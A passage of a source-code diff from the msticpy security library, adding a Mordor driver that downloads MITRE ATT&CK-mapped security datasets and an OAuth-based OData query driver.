+                cache_folder=cache_folder
+            )
+        self.mitre_techniques = MITRE_TECHNIQUES
+        self.mitre_tactics = MITRE_TACTICS
+
+        print("Retrieving Mordor data...")
+
+        self.mordor_data = _GET_MORDOR_METADATA(cache_folder=cache_folder)
+        self.mdr_idx_tech, self.mdr_idx_tact = _build_mdr_indexes(self.mordor_data)
+
+        self._connected = True
+        self.public_attribs = {
+            "mitre_techniques": self.mitre_techniques,
+            "mitre_tactics": self.mitre_tactics,
+            "driver_queries": self.driver_queries,
+            "search_queries": self.search_queries,
+        }
+
+    # pylint: enable=global-statement
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Other Parameters
+        ----------------
+        kwargs :
+            Are passed to the underlying provider query method,
+            if supported.
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+        del query_source
+        if not self._connected:
+            raise self._create_not_connected_err()
+        use_cached = kwargs.pop("used_cached", self.use_cached)
+        save_folder = kwargs.pop("save_folder", self.save_folder)
+        save_folder = _resolve_cache_folder(save_folder)
+        silent = kwargs.pop("silent", self.silent)
+        result_df = download_mdr_file(
+            file_uri=query,
+            use_cached=use_cached,
+            save_folder=save_folder,
+            silent=silent,
+        )
+        if not isinstance(result_df, pd.DataFrame) or result_df.empty:
+            return "Could not convert result to a DataFrame."
+        return result_df
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame plus native results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+
+        Returns
+        -------
+        Tuple[pd.DataFrame,Any]
+            A DataFrame and native results.
+
+        """
+        result = self.query(query, **kwargs)
+        if isinstance(result, pd.DataFrame):
+            return result, "OK"
+        return pd.DataFrame, result
+
+    @property
+    def driver_queries(self) -> Iterable[Dict[str, Any]]:
+        """
+        Return generator of Mordor query definitions.
+
+        Yields
+        ------
+        Iterable[Dict[str, Any]]
+            Iterable of Dictionaries containing query definitions.
+
+        """
+        if not self._connected:
+            raise self._create_not_connected_err()
+        if not self._driver_queries:
+            self._driver_queries = list(self._get_driver_queries())
+        return self._driver_queries
+
+    def _get_driver_queries(self):
+        """Generate iterable of Mordor queries."""
+        for mdr_item in self.mordor_data.values():
+            for file_path in mdr_item.get_file_paths():
+                mitre_data = mdr_item.get_attacks()
+                techniques = ", ".join(
+                    f"{att.technique}: {att.technique_name}" for att in mitre_data
+                )
+
+                tactics = ", ".join(
+                    f"{tac[0]}: {tac[1]}"
+                    for att in mitre_data
+                    for tac in att.tactics_full
+                )
+
+                doc_string: List[str] = [
+                    f"{mdr_item.title}",
+                    "",
+                    "Notes",
+                    "-----",
+                    f"Mordor ID: {mdr_item.id}",
+                    mdr_item.description or "",
+                    "",
+                    f"Mitre Techniques: {techniques}",
+                    f"Mitre Tactics: {tactics}",
+                ]
+                q_container, _, full_name = file_path["qry_path"].partition(".")
+                short_name = file_path["qry_path"].split(".")[-1]
+                yield {
+                    "name": full_name,
+                    "description": "\n".join(doc_string),
+                    "query_name": short_name,
+                    "query": file_path["file_path"],
+                    "query_container": q_container,
+                    "metadata": {},
+                }
+
+    def search_queries(self, search: str) -> Iterable[str]:
+        """
+        Search queries for matching attributes.
+
+        Parameters
+        ----------
+        search : str
+            Search string. Substrings separated by commas will
+            be treated as OR terms - e.g. "a, b" == "a" or "b".
+            Substrings separated by "+" will be treated as AND
+            terms - e.g. "a + b" == "a" and "b"
+
+        Returns
+        -------
+        Iterable[str]
+            Iterable of matching query names.
+
+
+        """
+        if not self._connected:
+            raise self._create_not_connected_err()
+        matches = []
+        for mdr_id in search_mdr_data(self.mordor_data, terms=search):
+            for file_path in self.mordor_data[mdr_id].get_file_paths():
+                matches.append(
+                    f"{file_path['qry_path']} ({self.mordor_data[mdr_id].title})"
+                )
+        return matches
+
+    @staticmethod
+    def _create_not_connected_err():
+        return MsticpyNotConnectedError(
+            "Please run the connect() method before running this method.",
+            title="not connected to Mordor.",
+            help_uri="https://msticpy.readthedocs.io/en/latest/DataProviders.html",
+        )
+
+
+def _resolve_cache_folder(cache_path: str):
+    """Expand and optionally creates cache folder."""
+    cache_folder = Path(cache_path).expanduser()
+    if not cache_folder.is_dir():
+        cache_folder.mkdir(parents=True, exist_ok=True)
+    return str(cache_folder)
+
+
+# pylint: enable=too-many-instance-attributes
+
+
+class MitreAttack:
+    """MitreAttack container for techniques and tactics."""
+
+    MTR_TECH_URI = "https://attack.mitre.org/techniques/{technique_id}/"
+    MTR_TAC_URI = "https://attack.mitre.org/tactics/{tactic_id}/"
+
+    def __init__(
+        self,
+        attack: Dict[str, Any] = None,
+        technique: str = None,
+        sub_technique: str = None,
+        tactics: List[str] = None,
+    ):
+        """
+        Create instance of MitreAttack.
+
+        Parameters
+        ----------
+        attack : Dict[str, Any], optional
+            attack data as dictionary, by default None
+        technique : str, optional
+            technique ID, by default None
+        sub_technique : str, optional
+            sub-technique ID, by default None
+        tactics : List[str], optional
+            List of associated tactics, by default None
+
+        """
+        if attack is None and (technique is None and tactics is None):
+            raise TypeError(
+                "Either 'attack' or 'technique' and 'tactics' must be specified."
+            )
+        self.technique = attack.get("technique") if attack else technique
+        self.sub_technique = attack.get("sub-technique") if attack else sub_technique
+        self.tactics = attack.get("tactics") if attack else tactics  # type: ignore
+
+        self._technique_name = None
+        self._technique_desc = None
+        self._technique_uri = None
+        self._tactics_full: List[Tuple[str, str, str, str]] = []
+
+    def __repr__(self) -> str:
+        """
+        Return repr of MitreAttack object.
+
+        Returns
+        -------
+        str
+            The repr of the object.
+
+        """
+        return "".join(
+            [
+                f"MitreAttack(technique={self.technique}), ",
+                f"sub_technique={self.sub_technique}, ",
+                f"tactics={repr(self.tactics)}",
+            ]
+        )
+
+    @property
+    def technique_name(self) -> Optional[str]:
+        """
+        Return Mitre Technique full name.
+
+        Returns
+        -------
+        Optional[str]
+            Name of the Mitre technique
+
+        """
+        if not self._technique_name and self.technique in MITRE_TECHNIQUES.index:
+            self._technique_name = MITRE_TECHNIQUES.loc[self.technique].Name
+        return self._technique_name
+
+    @property
+    def technique_desc(self) -> Optional[str]:
+        """
+        Return Mitre technique description.
+
+        Returns
+        -------
+        Optional[str]
+            Technique description
+
+        """
+        if not self._technique_desc and self.technique in MITRE_TECHNIQUES.index:
+            self._technique_desc = MITRE_TECHNIQUES.loc[self.technique].Description
+        return self._technique_desc
+
+    @property
+    def technique_uri(self) -> str:
+        """
+        Return Mitre Technique URI.
+
+        Returns
+        -------
+        Optional[str]
+            URI of the Mitre technique
+
+        """
+        return self.MTR_TECH_URI.format(technique_id=self.technique)
+
+    @property
+    def tactics_full(self) -> List[Tuple[str, str, str, str]]:
+        """
+        Return full listing of Mitre tactics.
+
+        Returns
+        -------
+        List[Tuple[str, str, str, str]]
+            List of tuples of:
+            (ID, Name, Description, URI)
+
+        """
+        if not self._tactics_full and self.tactics:
+            for tactic in self.tactics:
+                tactic_name = tactic_desc = "unknown"
+                if tactic in MITRE_TACTICS.index:
+                    tactic_name = MITRE_TACTICS.loc[tactic].Name
+                    tactic_desc = MITRE_TACTICS.loc[tactic].Description
+                tactic_uri = self.MTR_TAC_URI.format(tactic_id=tactic)
+                self._tactics_full.append(
+                    (tactic, tactic_name, tactic_desc, tactic_uri)
+                )
+        return self._tactics_full
+
+
+def _to_datetime(date_val) -> datetime:
+    """
+    Return datetime from parsed date string.
+
+    Parameters
+    ----------
+    date_val : datetime
+        The datetime or datetime string.
+
+    Returns
+    -------
+    datetime
+        Parse datetime.
+
+    """
+    if isinstance(date_val, datetime):
+        return date_val
+    try:
+        return pd.to_datetime(date_val)
+    except TypeError:
+        return datetime.min
+
+
+DS_PREFIX = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/"
+
+
+# pylint: disable=not-an-iterable, no-member
+
+
+@attr.s(auto_attribs=True)
+class MordorEntry:
+    """Mordor data set metadata."""
+
+    title: str
+    id: str
+    type: str
+    creation_date: datetime = attr.ib(converter=_to_datetime)
+    modification_date: datetime = attr.ib(converter=_to_datetime)
+    contributors: List[str] = attr.Factory(list)
+    author: Optional[str] = None
+    platform: Optional[str] = None
+    description: Optional[str] = None
+    tags: List[str] = attr.Factory(list)
+    files: List[Dict[str, Any]] = attr.Factory(list)
+    datasets: List[Dict[str, Any]] = attr.Factory(list)
+    attack_mappings: List[Dict[str, Any]] = attr.Factory(list)
+    notebooks: List[Dict[str, str]] = attr.Factory(list)
+    simulation: Dict[str, Any] = attr.Factory(dict)
+    references: List[Any] = attr.Factory(list)
+    _rel_file_paths: List[Dict[str, Any]] = attr.Factory(list)
+
+    def get_notebooks(self) -> List[Tuple[str, str, str]]:
+        """
+        Return the list of notebooks for the dataset.
+
+        Returns
+        -------
+        List[Tuple[str, str, str]]
+            Tuples of (name, project, link)
+
+        """
+        return [
+            (nbk.get("name", ""), nbk.get("project", ""), nbk.get("link", ""))
+            for nbk in self.notebooks
+        ]
+
+    def get_attacks(self) -> List[MitreAttack]:
+        """
+        Return list of Mitre attack classifications.
+
+        Returns
+        -------
+        List[MitreAttack]
+            List of MitreAttack definitions.
+
+        """
+        return [MitreAttack(attack=attack) for attack in self.attack_mappings]
+
+    def get_file_paths(self) -> List[Dict[str, str]]:
+        """
+        Return list of data file links.
+
+        Returns
+        -------
+        List[Dict[str, str]]
+            list of dictionaries describing files.
+            Each entry has key/values for:
+            - file_type
+            - file_path
+            - relative_path
+            - qry_path
+
+        """
+        if not self._rel_file_paths:
+            for file in self.files:
+                f_path = file.get("link")
+                if not f_path:
+                    continue
+                f_rel_path = f_path.replace(DS_PREFIX, "")
+                query_path = ".".join(Path(f_rel_path).parts).replace(
+                    Path(f_rel_path).suffix, ""
+                )
+                self._rel_file_paths.append(
+                    {
+                        "file_type": file.get("type"),
+                        "file_path": f_path,
+                        "relative_path": f_rel_path,
+                        "qry_path": query_path,
+                    }
+                )
+        return self._rel_file_paths
+
+
+# pylint: disable=not-an-iterable, no-member
+
+
+def get_mdr_data_paths(item_type="metadata") -> Generator[str, None, None]:
+    """
+    Generate Mordor data sets from GitHub repo.
+
+    Parameters
+    ----------
+    item_type : str, optional
+        The type of item required, by default "metadata"
+        Other values are "large", "small.
+
+    Yields
+    ------
+    str
+        Iterable of paths
+
+    """
+    md_tree = _GET_MORDOR_TREE(_MORDOR_TREE_URI)
+    yield from (
+        t_item["path"]
+        for t_item in md_tree.get("tree")
+        if t_item["type"] == "blob"
+        and t_item["path"].startswith("datasets")
+        and item_type in t_item["path"]
+    )
+
+
+def _get_mdr_github_tree():
+    """Closure to wrap fetching Mordor tree from GitHub."""
+    mordor_tree = None
+
+    def _get_mdr_tree(uri):
+        nonlocal mordor_tree
+        if mordor_tree is None:
+            resp = httpx.get(uri)
+            mordor_tree = resp.json()
+        return mordor_tree
+
+    return _get_mdr_tree
+
+
+# Create closure
+_GET_MORDOR_TREE = _get_mdr_github_tree()
+
+
+def _get_mdr_file(gh_file):
+    """Fetch a file from Mordor repo."""
+    file_blob_uri = (
+        f"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/{gh_file}"
+    )
+    file_resp = httpx.get(file_blob_uri)
+    return file_resp.content
+
+
+def _create_mdr_metadata_cache():
+    md_metadata: Dict[str, MordorEntry] = {}
+
+    def _get_mdr_metadata(cache_folder: Optional[str] = None):
+        nonlocal md_metadata
+        if not md_metadata:
+            md_metadata = _fetch_mdr_metadata(cache_folder=cache_folder)
+        return md_metadata
+
+    return _get_mdr_metadata
+
+
+# Create closure
+_GET_MORDOR_METADATA = _create_mdr_metadata_cache()
+
+_LAST_UPDATE_KEY = "mp_last_updated"
+_DEFAULT_TS = pd.Timestamp(pd.Timestamp.utcnow() - pd.Timedelta(days=60))
+
+
+# pylint: disable=global-statement
+def _fetch_mdr_metadata(cache_folder: Optional[str] = None) -> Dict[str, MordorEntry]:
+    """
+    Return full metadata for Mordor datasets.
+
+    Parameters
+    ----------
+    cache_folder : Optional[str]
+        Folder to search for mordor cache, by default None
+
+    Returns
+    -------
+    Dict[str, MordorEntry]:
+        Mordor data set metadata keyed by MordorID
+
+    """
+    global MITRE_TECHNIQUES, MITRE_TACTICS
+
+    if MITRE_TECHNIQUES is None or MITRE_TACTICS is None:
+        MITRE_TECHNIQUES, MITRE_TACTICS = _get_mitre_categories()
+    md_metadata: Dict[str, MordorEntry] = {}
+
+    md_cached_metadata = _read_mordor_cache(cache_folder)
+    mdr_md_paths = list(get_mdr_data_paths("metadata"))
+    for filename in tqdm(
+        mdr_md_paths, unit=" files", desc="Downloading Mordor metadata"
+    ):
+        cache_valid = False
+        if filename in md_cached_metadata:
+            metadata_doc = md_cached_metadata[filename]
+            last_timestamp = pd.Timestamp(
+                metadata_doc.get(_LAST_UPDATE_KEY, _DEFAULT_TS)
+            )
+            cache_valid = (pd.Timestamp.utcnow() - last_timestamp).days < 30
+
+        if not cache_valid:
+            gh_file_content = _get_mdr_file(filename)
+            try:
+                metadata_doc = yaml.safe_load(gh_file_content)
+            except yaml.error.YAMLError:
+                continue
+            metadata_doc[_LAST_UPDATE_KEY] = pd.Timestamp.utcnow().isoformat()
+            md_cached_metadata[filename] = metadata_doc
+        doc_id = metadata_doc.get("id")
+        mdr_entry = metadata_doc.copy()
+        mdr_entry.pop(_LAST_UPDATE_KEY, None)
+        md_metadata[doc_id] = MordorEntry(**mdr_entry)
+
+    _write_mordor_cache(md_cached_metadata, cache_folder)
+    return md_metadata
+
+
+# pylint: enable=global-statement
+
+
+def _read_mordor_cache(cache_folder) -> Dict[str, Any]:
+    """Return dictionary of cached metadata if cached_folder is a valid path."""
+    md_cached_metadata: Dict[str, Any] = {}
+    mordor_cache = Path(cache_folder).joinpath(_MORDOR_CACHE)
+    if _valid_cache(mordor_cache):
+        try:
+            md_json = Path(mordor_cache).read_text(encoding="utf-8")
+            md_cached_metadata = json.loads(md_json)
+        except json.JSONDecodeError:
+            pass
+    return md_cached_metadata
+
+
+def _write_mordor_cache(md_cached_metadata, cache_folder):
+    """Write dictionary of cached metadata if cached_folder is a valid path."""
+    mordor_cache = Path(cache_folder).joinpath(_MORDOR_CACHE)
+    json_text = json.dumps(md_cached_metadata, indent=4)
+    Path(mordor_cache).write_text(json_text, encoding="utf-8")
+
+
+def _build_mdr_indexes(
+    mdr_metadata: Dict[str, MordorEntry]
+) -> Tuple[Dict[str, Set[str]], Dict[str, Set[str]]]:
+    """
+    Return dictionaries mapping Mitre items to Mordor datasets.
+
+    Parameters
+    ----------
+    mdr_metadata : Dict[str, MordorEntry]
+        Dictionary of mordor dataset metadata.
+
+    Returns
+    -------
+    Tuple[Dict[str, Set[str]], Dict[str, Set[str]]]
+        Mordor dataset IDs keyed by Mitre Technique and Mitre Tactic.
+
+    """
+    md_idx_techniques = defaultdict(set)
+    md_idx_tactics = defaultdict(set)
+
+    for md_id, md_file in mdr_metadata.items():
+        for attack in md_file.get_attacks():
+            md_idx_techniques[attack.technique].add(md_id)
+            if not attack.tactics:
+                continue
+            for tactic in attack.tactics:
+                md_idx_tactics[tactic].add(md_id)
+
+    return md_idx_techniques, md_idx_tactics  # type: ignore
+
+
+def download_mdr_file(
+    file_uri: str, use_cached: bool = True, save_folder: str = ".", silent: bool = False
+) -> pd.DataFrame:
+    """
+    Download data file from Mordor.
+
+    Parameters
+    ----------
+    file_uri : str
+        The URI of the file to download.
+    use_cached : bool, optional
+        Try to use locally saved file first, by default True
+    save_folder : str, optional
+        Path to output folder, by default "."
+    silent : bool
+        If True, suppress feedback. By default, False.
+
+    Returns
+    -------
+    pd.DataFrame
+        DataFrame of Dataset
+
+    """
+    if not silent:
+        print(file_uri)
+    if not file_uri.lower().endswith("zip"):
+        raise TypeError(f"File type not supported {file_uri}")
+    if not Path(save_folder).is_dir():
+        Path(save_folder).mkdir(parents=True, exist_ok=True)
+    save_path = "-".join(Path(file_uri.replace(DS_PREFIX, "")).parts)
+    save_file = Path(save_folder).joinpath(save_path)
+    if not use_cached or not save_file.is_file():
+        # streamed download
+        with open(str(save_file), "wb") as fdesc:
+            with httpx.stream("GET", file_uri) as resp:
+                for chunk in resp.iter_bytes(chunk_size=1024):
+                    fdesc.write(chunk)
+
+    try:
+        with zipfile.ZipFile(str(save_file)) as zip_file:
+            file_names = zip_file.namelist()
+            d_frames = {
+                file_name: _extract_zip_file_to_df(
+                    zip_file, file_name, use_cached, save_folder, silent
+                )
+                for file_name in file_names
+            }
+            return pd.concat(d_frames.values())
+    except BadZipFile as bad_zip_err:
+        raise MsticpyUserError(
+            f"Could not extract zip file for {file_uri}.",
+            "File does not exist or is corrupt.",
+            title="Mordor download error",
+            help_uri="https://msticpy.readthedocs.io/en/latest/data_acquisition/MordorData.html",
+        ) from bad_zip_err
+
+
+def _extract_zip_file_to_df(  # noqa: MC0001
+    zip_file: ZipFile,
+    file_name: str,
+    use_cached: bool = True,
+    save_folder: str = ".",
+    silent: bool = False,
+) -> pd.DataFrame:
+    """
+    Extract from zip and parse json file to DataFrame.
+
+    Parameters
+    ----------
+    zip_file : ZipFile
+        ZipFile object containing the file
+    file_name : str
+        File name to extract
+    use_cached : bool, optional
+        Try to use locally saved file first, by default True
+    save_folder : str, optional
+        Path to output folder, by default "."
+    silent : bool
+        If False, suppress feedback. By default, True.
+
+    Returns
+    -------
+    pd.DataFrame
+        Extracted DataFrame
+
+    """
+    if not silent:
+        print("Extracting", file_name)
+
+    file_path = Path(save_folder).joinpath(file_name)
+    if not use_cached or not file_path.is_file():
+        zip_file.extract(file_name, path=save_folder)
+
+    out_df = pd.DataFrame()
+    if file_path.suffix.lower() == ".json":
+        out_df = pd.read_json(file_path, lines=True)
+    if file_path.suffix.lower() == ".csv":
+        out_df = pd.read_csv(file_path)
+    if file_path.suffix.lower() not in (".json", ".csv"):
+        print(f"Cannot process files of type {file_path.suffix.lower()}")
+    if not use_cached:
+        Path(file_name).unlink()
+    return out_df
+
+
+def search_mdr_data(
+    mdr_data: Dict[str, MordorEntry], terms: str = None, subset: Iterable[str] = None
+) -> Set[str]:
+    """
+    Return IDs for items matching terms.
+
+    Parameters
+    ----------
+    mdr_data : Dict[str, MordorEntry]
+        Mordor dataset
+    terms : str, optional
+        Search terms, by default None
+        (comma-separated values are treated as OR terms
+        plus-separated values are treated as AND terms)
+    subset : Iterable[str], optional
+        A subset of IDs over which to search, by default None
+
+    Returns
+    -------
+    Set[str]
+        The set of matching IDs.
+
+    """
+    if terms is None:
+        return set(subset or mdr_data.keys())
+    logic = "OR"
+    if "," in terms:
+        search_terms = terms.split(",")
+    elif "+" in terms:
+        search_terms = terms.split("+")
+        logic = "AND"
+    else:
+        search_terms = [terms]
+    results: Set[str] = set()
+    for search_idx, term in enumerate(search_terms):
+        item_results = set()
+        for md_id, item in mdr_data.items():
+            if subset is not None and md_id not in subset:
+                continue
+            if term.strip() in str(item):
+                item_results.add(md_id)
+        if logic == "OR":
+            results = results | item_results
+        else:
+            # Don't AND if search_idx == 0 (and-ing against empty results)
+            results = results & item_results if search_idx else item_results
+    return results
+
+
+def _extract_mitre_refs(ext_refs):
+    ref_dict = [
+        ref
+        for ref in ext_refs
+        if "source_name" in ref and ref["source_name"] == "mitre-attack"
+    ]
+    if ref_dict:
+        return ref_dict[0]
+    return {}
+
+
+def _reshape_mitre_df(data):
+    col_rename = {"external_id": "ID", "name": "Name", "description": "Description"}
+    return (
+        data.join(
+            data.apply(
+                lambda x: _extract_mitre_refs(x.external_references),
+                axis=1,
+                result_type="expand",
+            )
+        )
+        .assign(MitreGroup="Enterprise")[["external_id", "name", "description", "url"]]
+        .rename(columns=col_rename)
+        .sort_values("ID")
+        .set_index("ID")
+    )
+
+
+def _get_mitre_categories(
+    cache_folder: Optional[str] = None,
+) -> Tuple[pd.DataFrame, pd.DataFrame]:
+    """
+    Download and return Mitre techniques and tactics.
+
+    Parameters
+    ----------
+    cache_folder : Optional[str]
+        Folder to search for mordor cache, by default None
+
+    Returns
+    -------
+    Tuple[pd.DataFrame, pd.DataFrame]
+        Tuple of techniques, tactics with IDs, names,
+        descriptions.
+
+    """
+    if cache_folder:
+        tech_cache = Path(cache_folder).joinpath(_MITRE_TECH_CACHE)
+        tactics_cache = Path(cache_folder).joinpath(_MITRE_TACTICS_CACHE)
+        if _valid_cache(tech_cache) and _valid_cache(tactics_cache):
+            try:
+                tech_df = pd.read_pickle(tech_cache)
+                tactics_df = pd.read_pickle(tactics_cache)
+                return tech_df, tactics_df
+            except pickle.PickleError:
+                pass
+    resp = httpx.get(_MITRE_JSON_URL)
+    mitre = pd.json_normalize(resp.json()["objects"])
+
+    # remove deprecated items
+    mitre["x_mitre_deprecated"].fillna(False, inplace=True)
+    mitre = mitre[~(mitre["x_mitre_deprecated"])]
+
+    tech_df = _reshape_mitre_df(mitre[mitre.type == "attack-pattern"])
+    tactics_df = _reshape_mitre_df(mitre[mitre.type == "x-mitre-tactic"])
+    if cache_folder:
+        tech_df.to_pickle(tech_cache)
+        tactics_df.to_pickle(tactics_cache)
+
+    return tech_df, tactics_df
+
+
+def _valid_cache(path: Path, expired_days=30):
+    """Return True if the file exists and is younger than `expired_days`."""
+    if not path.is_file():
+        return False
+    days_old = (datetime.now() - datetime.fromtimestamp(path.stat().st_mtime)).days
+    return days_old < expired_days
diff --git a/msticpy/data/drivers/odata_driver.py b/msticpy/data/drivers/odata_driver.py
new file mode 100644
index 000000000..8ae51a155
--- /dev/null
+++ b/msticpy/data/drivers/odata_driver.py
@@ -0,0 +1,326 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""OData Driver class."""
+import abc
+import re
+import urllib
+from typing import Any, Dict, Iterable, Optional, Tuple, Union
+
+import pandas as pd
+import httpx
+
+from ..._version import VERSION
+from ...common import pkg_config as config
+from ...common.provider_settings import get_provider_settings
+from ...common.exceptions import MsticpyConnectionError, MsticpyUserConfigError
+from .driver_base import DriverBase, QuerySource
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_HELP_URI = (
+    "https://msticpy.readthedocs.io/en/latest/data_acquisition"
+    "/DataProviders.html#connecting-to-an-odata-source"
+)
+
+# pylint: disable=too-many-instance-attributes
+
+
+class OData(DriverBase):
+    """Parent class to retreive date from an oauth based API."""
+
+    CONFIG_NAME = ""
+    _ALT_CONFIG_NAMES: Iterable[str] = []
+
+    def __init__(self, **kwargs):
+        """
+        Instantiate OData driver and optionally connect.
+
+        Parameters
+        ----------
+        connect: bool, optional
+            Set true if you want to connect to the provider at initialization
+
+        """
+        super().__init__(**kwargs)
+        self.oauth_url: Optional[str] = None
+        self.req_body: Optional[Dict[str, Optional[str]]] = None
+        self.api_ver: Optional[str] = None
+        self.api_root: Optional[str] = None
+        self.request_uri: Optional[str] = None
+        self.req_headers = {
+            "Content-Type": "application/json",
+            "Accept": "application/json",
+            "Authorization": None,
+        }
+        self._loaded = True
+        self.aad_token = None
+        self._debug = kwargs.get("debug", False)
+
+    @abc.abstractmethod
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The query to execute
+        query_source : QuerySource
+            The query definition object
+
+        Returns
+        -------
+        Union[pd.DataFrame, Any]
+            A DataFrame (if successfull) or
+            the underlying provider result if an error.
+
+        """
+
+    def connect(
+        self,
+        connection_str: Optional[str] = None,
+        **kwargs,
+    ):
+        """
+        Connect to oauth data source.
+
+        Parameters
+        ----------
+        connection_str: Optional[str], optional
+            Connect to a data source
+        instance : Optional[str], optional
+            Optional name of configuration instance - this
+            is added as a prefix to the driver configuration key name
+            when searching for configuration in the msticpyconfig.yaml
+
+        Notes
+        -----
+        Connection string fields:
+        tenant_id
+        client_id
+        client_secret
+        apiRoot
+        apiVersion
+
+        """
+        cs_dict: Dict[str, Any] = {}
+        if connection_str:
+            self.current_connection = connection_str
+            cs_dict = self._parse_connection_str(connection_str)
+        else:
+            instance = kwargs.pop("instance", None)
+            cs_dict = _get_driver_settings(
+                self.CONFIG_NAME, self._ALT_CONFIG_NAMES, instance
+            )
+            # let user override config settings with function kwargs
+            cs_dict.update(kwargs)
+
+        missing_settings = [
+            setting
+            for setting in ("tenant_id", "client_id", "client_secret")
+            if setting not in cs_dict
+        ]
+        if missing_settings:
+            raise MsticpyUserConfigError(
+                "You must supply the following required connection parameter(s)",
+                "to the connect function or add them to your msticpyconfig.yaml.",
+                ", ".join(f"'{param}'" for param in missing_settings),
+                title="Missing connection parameters.",
+                help_uri=("Connecting to OData sources.", _HELP_URI),
+            )
+
+        # self.oauth_url and self.req_body are correctly set in concrete
+        # instances __init__
+        req_url = self.oauth_url.format(tenantId=cs_dict["tenant_id"])  # type: ignore
+        req_body = dict(self.req_body)  # type: ignore
+        req_body["client_id"] = cs_dict["client_id"]
+        req_body["client_secret"] = cs_dict["client_secret"]
+
+        # Authenticate and obtain AAD Token for future calls
+        data = urllib.parse.urlencode(req_body).encode("utf-8")
+        response = httpx.post(url=req_url, content=data)
+        json_response = response.json()
+        self.aad_token = json_response.get("access_token", None)
+        if not self.aad_token:
+            raise MsticpyConnectionError(
+                f"Could not obtain access token - {json_response['error_description']}"
+            )
+
+        self.req_headers["Authorization"] = "Bearer " + self.aad_token
+        self.api_root = cs_dict.get("apiRoot", self.api_root)
+        if not self.api_root:
+            raise ValueError(
+                f"Sub class {self.__class__.__name__}", "did not set self.api_root"
+            )
+        api_ver = cs_dict.get("apiVersion", self.api_ver)
+        self.request_uri = self.api_root + str(api_ver)
+
+        print("Connected.")
+        self._connected = True
+
+        json_response["access_token"] = None
+        return json_response
+
+    # pylint: disable=too-many-branches
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """
+        Execute query string and return DataFrame of results.
+
+        Parameters
+        ----------
+        query : str
+            The kql query to execute
+
+        Returns
+        -------
+        Tuple[pd.DataFrame, results.ResultSet]
+            A DataFrame (if successfull) and
+            Kql ResultSet.
+
+        """
+        if not self.connected:
+            self.connect(self.current_connection)
+        if not self.connected:
+            raise ConnectionError(
+                "Source is not connected. ", "Please call connect() and retry."
+            )
+
+        if self._debug:
+            print(query)
+
+        # Build request based on whether endpoint requires data to be passed in
+        # request body in or URL
+        if kwargs["body"] is True:
+            req_url = self.request_uri + kwargs["api_end"]
+            req_url = urllib.parse.quote(req_url, safe="%/:=&?~#+!$,;'@()*[]")
+            body = {"Query": query}
+            response = httpx.post(
+                url=req_url, headers=self.req_headers, content=str(body)
+            )
+        else:
+            # self.request_uri set if self.connected
+            req_url = self.request_uri + query  # type: ignore
+            response = httpx.get(url=req_url, headers=self.req_headers)
+
+        self._check_response_errors(response)
+
+        json_response = response.json()
+        if isinstance(json_response, int):
+            print(
+                "Warning - query did not complete successfully.",
+                "Check returned response.",
+            )
+            return None, json_response
+
+        result = json_response.get("Results", json_response)
+
+        if not result:
+            print("Warning - query did not return any results.")
+            return None, json_response
+        return pd.json_normalize(result), json_response
+
+    # pylint: enable=too-many-branches
+
+    @staticmethod
+    def _check_response_errors(response):
+        """Check the response for possible errors."""
+        if response.status_code == httpx.codes["ok"]:
+            return
+        print(response.json()["error"]["message"])
+        if response.status_code == 401:
+            raise ConnectionRefusedError(
+                "Authentication failed - possible ", "timeout. Please re-connect."
+            )
+        # Raise an exception to handle hitting API limits
+        if response.status_code == 429:
+            raise ConnectionRefusedError("You have likely hit the API limit. ")
+        response.raise_for_status()
+
+    @staticmethod
+    def _parse_connection_str(connection_str: str) -> Dict[str, str]:
+        """
+        Split connection string components into dictionary.
+
+        Parameters
+        ----------
+        connection_str : str
+            Semi-colon delimited connection string
+
+        Returns
+        -------
+        Dict[str, str]
+            dict of key/pair values
+
+        """
+        cs_items = connection_str.split(";")
+        return {
+            prop[0]: prop[1]
+            for prop in [item.strip().split("=") for item in cs_items]
+            if prop[0] and prop[1]
+        }
+
+    @staticmethod
+    def _prepare_param_dict_from_filter(filterstr: str) -> Dict[str, str]:
+        """
+        Parse filter string into dictionary.
+
+        Parameters
+        ----------
+        filterstr : str
+            OData filter string
+
+        """
+        get_params = {}
+        for filter_param in re.split(r"[\?\&]+", filterstr):
+            if filter_param:
+                attr = filter_param.split("=")[0]
+                val = filter_param.split("=")[1]
+                get_params[attr] = val
+        return get_params
+
+
+_CONFIG_NAME_MAP = {
+    "tenant_id": ("tenantid", "tenant_id"),
+    "client_id": ("clientid", "client_id"),
+    "client_secret": ("clientsecret", "client_secret"),
+}
+
+
+def _map_config_dict_name(config_dict: Dict[str, str]):
+    """Map configuration parameter names to expected values."""
+    mapped_dict = config_dict.copy()
+    for provided_name in config_dict:
+        for req_name, alternates in _CONFIG_NAME_MAP.items():
+            if provided_name.casefold() in alternates:
+                mapped_dict[req_name] = config_dict[provided_name]
+                break
+    return mapped_dict
+
+
+def _get_driver_settings(
+    config_name: str, alt_names: Iterable[str], instance: Optional[str] = None
+) -> Dict[str, str]:
+    """Try to retrieve config settings for OAuth drivers."""
+    config_key = f"{config_name}-{instance}" if instance else config_name
+    drv_config = get_provider_settings("DataProviders").get(config_key)
+    app_config: Dict[str, str] = {}
+    if drv_config:
+        app_config = dict(drv_config.args)
+    else:
+        # Otherwise fall back on legacy settings location
+        for alt_name in alt_names:
+            alt_key = f"{alt_name}-{instance}" if instance else alt_name
+            app_config = config.settings.get(alt_key, {}).get("Args")
+            if app_config:
+                break
+
+    if not app_config:
+        return {}
